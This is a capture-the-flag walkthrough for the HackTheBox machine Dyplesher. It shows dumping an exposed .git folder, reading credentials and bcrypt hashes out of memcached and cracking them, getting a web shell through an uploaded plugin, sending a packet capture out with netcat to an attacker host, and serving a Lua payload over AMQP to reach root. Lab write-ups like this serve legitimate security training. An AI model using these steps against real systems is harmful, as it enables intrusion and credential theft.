SecWalk.com

HTB Walkthrough Dyplesher 10.10.10.190

Summary

Dyplesher was released on the 23rd of May 2020.

Foothold

This machine is rated Insane. To gain a foothold we had to dump an exposed .git folder.

User

After a lot of enumeration and a few logins we finally arrived at the login page where we can upload a malicious plugin, which gives us a web shell with code execution. This way I could write my SSH key for this user and log in to the box. After looking around we see that the user is in a group called wireshark, which means we can capture packets and read the output. After studying those captures we got some new credentials and were able to get user.txt.

Root

Felamos's home folder contains a hint that there is a tool which reviews the code automatically; after some research I found out this is done over AMQP. To get root we took advantage of that AMQP service.

Enumeration

Nmap

nmap -p- -A 10.10.10.190


Web

Going to http://10.10.10.190 shows:

http://10.10.10.190/login shows:

Nothing interesting to find here.

The page shown earlier contained the host name test.dyplesher.htb, so I added test.dyplesher.htb to /etc/hosts.

http://test.dyplesher.htb shows:

I couldn't find anything on this page, so I moved on.

http://10.10.10.190:3000 shows:

Also nothing to find right now

The nmap result showed there should be a .git directory on port 80:

http://10.10.10.190/.git shows:

But since there is a vhost we should check that one as well:

Looks like something is there but there is no direct access, so time to poke around a bit.

Research on exposed git directories showed there should be a way to dump the git files; I found the following tool:

https://github.com/internetwache/GitTools

mkdir gitdump

bash dumper.sh http://test.dyplesher.htb/.git/ /root/s3cwalk/dyplesher/gitdump/

We could extract some files.

When we look into the index file we see the following:


Looks like this file has been removed; after some research it turned out that we could restore the file with git restore:

git restore index.php
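
To show what an exposed .git directory leaks even after the working copy has been cleaned up, here is an added Python example (not part of this post, and not code from GitTools) that builds a small version-2 git index from constructed placeholder files and parses it back out, listing every tracked path with the blob id git would assign. The file names and contents are made up for the example; the blob ids are derived the way git derives them.

```python
import hashlib
import struct

# Constructed sample: three tracked files and their contents (placeholders,
# not the box's real files).
SAMPLE_FILES = {
    "index.php": b"<?php\n// constructed placeholder\n",
    "login.php": b"<?php\n// constructed placeholder\n",
    "README.md": b"# sample\n",
}


def blob_id(content: bytes) -> str:
    """Object id git assigns to a blob: sha1 over "blob <size>\\0<content>"."""
    return hashlib.sha1(b"blob %d\0" % len(content) + content).hexdigest()


def build_index(files: dict) -> bytes:
    """Serialise a minimal version-2 .git/index for the given files.

    Only the fields a parser needs are filled in; stat data is zeroed.
    """
    body = b"DIRC" + struct.pack(">II", 2, len(files))
    for path in sorted(files):  # git keeps entries sorted by path
        content = files[path]
        name = path.encode()
        flags = min(len(name), 0xFFF)  # low 12 bits of flags = name length
        # ctime(s,ns) mtime(s,ns) dev ino mode uid gid size
        entry = struct.pack(">10I", 0, 0, 0, 0, 0, 0, 0o100644, 0, 0, len(content))
        entry += bytes.fromhex(blob_id(content)) + struct.pack(">H", flags) + name
        entry += b"\0" * (8 - len(entry) % 8)  # 1-8 NULs: terminate name, pad to 8
        body += entry
    return body + hashlib.sha1(body).digest()  # trailing checksum over everything


def parse_index(data: bytes) -> list:
    """Parse a version-2 git index and return one dict per entry."""
    if data[:4] != b"DIRC":
        raise ValueError("not a git index (bad signature)")
    version, count = struct.unpack(">II", data[4:12])
    if version != 2:
        raise ValueError(f"index version {version} not handled by this example")
    # A truncated or tampered dump fails here instead of yielding garbage.
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch (truncated or tampered)")
    entries, pos = [], 12
    for _ in range(count):
        fields = struct.unpack(">10I20sH", data[pos:pos + 62])
        mode, size, sha, flags = fields[6], fields[9], fields[10], fields[11]
        name_len = flags & 0x0FFF
        if name_len == 0x0FFF:  # name too long for the field: scan for the NUL
            name_len = data.index(b"\0", pos + 62) - (pos + 62)
        name = data[pos + 62:pos + 62 + name_len].decode()
        entries.append({"path": name, "mode": mode, "size": size, "blob": sha.hex()})
        entry_len = 62 + name_len
        pos += entry_len + (8 - entry_len % 8)
    return entries


if __name__ == "__main__":
    for e in parse_index(build_index(SAMPLE_FILES)):
        print(f"{e['mode']:o} {e['blob']} {e['size']:>6} {e['path']}")
```

An index entry outlives the removal of its file from the working tree until the deletion is staged, which is why git restore could bring index.php back from the dump. The defence is not to deploy a .git directory under the web root at all, or to deny it at the web server.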

We found some credentials for Memcached; this port was also open in the nmap scan, so time to go poke around there.

Memcached

Getting values out of memcached:

memccat email --servers=10.10.10.190 --username=felamos --password=zxcvbnm


MinatoTW@dyplesher.htb
felamos@dyplesher.htb
yuntao@dyplesher.htb

memccat username --servers=10.10.10.190 --username=felamos --password=zxcvbnm

MinatoTW
felamos
yuntao

memccat password --servers=10.10.10.190 --username=felamos --password=zxcvbnm

$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK
$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS

We found some valuable information; let's now try to crack these bcrypt hashes:

hashcat64.exe -m 3200 hashes.txt rockyou.txt

$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK:mommy1
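
To make the hash assessment concrete, here is an added Python example (not from the original post) that parses the bcrypt strings read out of memcached above, reports the variant and cost factor of each, and flags low-cost and malformed strings. The MIN_COST threshold of 12 is an assumption chosen for the example, and note that cost alone does not rescue a weak password: the hash that fell to rockyou was the cost-12 one.

```python
import re

# Format: $<variant>$<cost>$<22-char salt><31-char digest>, 60 characters in all.
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

# Threshold chosen for this example (assumption, not a value from the post).
MIN_COST = 12

# The three password hashes read out of memcached on this page.
PAGE_HASHES = [
    "$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa",
    "$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK",
    "$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS",
]


def parse_bcrypt(h: str) -> dict:
    """Split a bcrypt string into its parts; raise ValueError if malformed."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError(f"malformed bcrypt string ({len(h)} chars, expected 60)")
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    if not 4 <= cost <= 31:
        raise ValueError(f"cost {cost} outside bcrypt's 4..31 range")
    return {
        "variant": variant,
        "cost": cost,
        "rounds": 2 ** cost,  # key-setup iterations, doubling per cost step
        "salt": salt,
        "digest": digest,
    }


def assess(hashes, min_cost=MIN_COST) -> list:
    """Classify each hash as ok, weak-cost or malformed with a short detail."""
    findings = []
    for h in hashes:
        try:
            p = parse_bcrypt(h)
        except ValueError as err:
            findings.append({"hash": h, "status": "malformed", "detail": str(err)})
            continue
        status = "ok" if p["cost"] >= min_cost else "weak-cost"
        detail = f"{p['variant']} cost={p['cost']} ({p['rounds']} rounds)"
        findings.append({"hash": h, "status": status, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in assess(PAGE_HASHES):
        print(f"{f['status']:<10} {f['detail']:<40} {f['hash'][:20]}...")
```

As copied on this page the third memcached hash is one character short of bcrypt's fixed 60, and the parser reports that rather than silently accepting it; a defender auditing a stored hash set wants the same strictness.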

We can now log in to http://10.10.10.190:3000:


Once logged in there does not seem to be much, but under Releases there is a file called repo.zip.

This file contains a folder named repositories with git bundle files; since these are repositories, let's try to git clone them:

git clone 4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle

git clone 4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle

git clone 6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle

git clone d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

In this folder there is a DB file which contains a hash:

s3cwalk/dyplesher/repositories/@hashed/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity/user.db


$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6

This is also bcrypt; when we crack it the password is alexis1.

The next step is to find out where to log in with it and with which username. From the web enumeration earlier there is still a page we weren't able to log in to, so let's try that one:

http://10.10.10.190/login

and we are logged in:


Time to develop our own malicious plugin.

Adding a new Java package:

Adding a new class:

Adding plugin.yml:

Also create pom.xml.

plugin.yml contains:

The main class contains:

pom.xml contains:

Time to build the jar file:

Upload the plugin:

Load the plugin:

Check if the plugin is loaded:

visit: http://test.dyplesher.htb/secwalk.php?cmd=id

Upload our SSH RSA public key for MinatoTW:

Log in with SSH:

id shows that we are in the wireshark group; with Wireshark we can capture the network traffic:

tshark -i any -w secwalk.pcap

Sending the file with netcat to my machine so I can inspect it visually in Wireshark:

send: nc -w 3 10.10.14.12 11211 < secwalk.pcap

receive: nc -l -p 11211 > secwalk.pcap

Found credentials in an AMQP packet:

And we got our first flag:

Felamos's home folder contains a hint for the root privesc:

Earlier in the Wireshark capture there were also credentials for the AMQP service; this service does exactly what the hint mentions, so let's try to exploit that.

First we need to create/edit a Python script so we can connect to the service:

After this is done we create a Lua file which writes our RSA SSH key to the root folder:

Our Lua payload file looks like:

python -m SimpleHTTPServer 5672

python3 shell.py http://10.10.14.12:5672/payload.lua

We can see the command was successful:

And we got root on the box:

Job done

Made by: S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
